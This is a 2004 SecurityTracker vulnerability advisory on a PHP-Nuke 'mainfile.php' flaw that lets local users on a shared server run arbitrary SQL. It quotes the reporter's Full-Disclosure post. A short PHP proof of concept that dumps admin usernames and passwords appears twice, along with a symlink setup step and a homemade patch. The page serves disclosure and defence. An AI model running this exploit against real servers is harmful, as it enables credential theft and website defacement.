SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  PHP-Nuke Vendors:  Phpnuke.org
PHP-Nuke 'mainfile.php' Lets Local Users Execute Arbitrary SQL Queries
SecurityTracker Alert ID:  1010351
SecurityTracker URL:  http://securitytracker.com/id?1010351
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 1 2004
Impact:  Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Modification of system information, Modification of user information
Exploit Included:  Yes  
Description:  A vulnerability was reported in PHP-Nuke. A local user can execute arbitrary SQL queries on the underlying database.

Luca Falavigna reported that a local user can create PHP code that invokes 'mainfile.php' to make SQL queries to the PHP-Nuke database. The necessary database connection information is supplied by 'config.php' on the system, the report said.

A demonstration exploit example is provided:

<?php
require_once ("/location_of_victim's_PHPNuke/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
unset($sql);
?>

Th e report indicates that for this exploit to work, the local user must first create a symbolic link that points to the database directory in the PHP-Nuke home directory.

The report also indicates that any content management system that does not validate domain names may also be affected.
Impact:  A local user can execute arbitrary SQL queries on the underlying database.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.phpnuke.org/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Luca Falavigna <fala83@libero.it>
Message History:   None.

 Source Message Contents
Date:  Sun, 30 May 2004 16:53:18 +0200
From:  Luca Falavigna <fala83@libero.it>
Subject:  [Full-Disclosure] Possible bug in PHPNuke and other CMS

 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

There is a vulnerability in PHPNuke that permits execution of arbitrary
SQL queries on a database located in the same server of an attacker's
account. This is the procedure: first of all attacker must create a
symlink pointing to victim's db directory in PHPNuke home directory
because of mainfile.php include method. After that he can build a simple
php code executing a query to the PHPNuke database. Here is an example:

<?php
require_once ("/location_of_victim's_PHPNuke/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~  echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n"
;
unset($sql);
?>

Queries are executed normally because config.php (which is included by
mainfile.php) provides the information in order to connect to the chosen
database. This is a very easy way to deface PHPNuke-based websites or
adding and removing users, and so on.

This "homemade patch" goes in config.php, just below connection
variables. It checks domain name provided by web server with the one
provided by the user and grants execution of SQL queries only if domain
names match. Here is the code:

$domainname = "www.example.com";
if ($_SERVER['SERVER_NAME'] != $domainname ) {
~  echo "Access denied";
~  die();
 

This vulnerability isn't only for PHPNuke, but also for every CMS that
doesn't check domain names.

Greetings,

					Luca Falavigna

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iQEVAwUBQLn1V/TtdJayrm9xAQL8jAf+MV1wlF5MJW8nDez3kOoHugvqmb2L2ftG
kwkEfl/zERPfsu651/PM9ocDkm1z+pLJh6kzPusED2GVuZOGY9Gbd5P5dOjGc7qX
OqEzXMRWkX3r2joAzyjKsO24sAc4YNI0FQPPFve9sZqRMdG+vF4VzIoldjiegSVH
d5rLceL/AojrzEakUiBGBUuKJN/k0uG3NzACra3Oa8haMwlTvQmY0VRjSgGArCq2
ohpSlCTZOk4iANYJXHaZE0u+Ep0t4UOCZK9j/jM8rjMdpCynWCkGo/FzcreakHom
FCHAR9m0LJ0UuuPU/1VbamwZ6OlNhdMWau9wIKJGW0bsWnzSwd7llg==
=JnMQ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC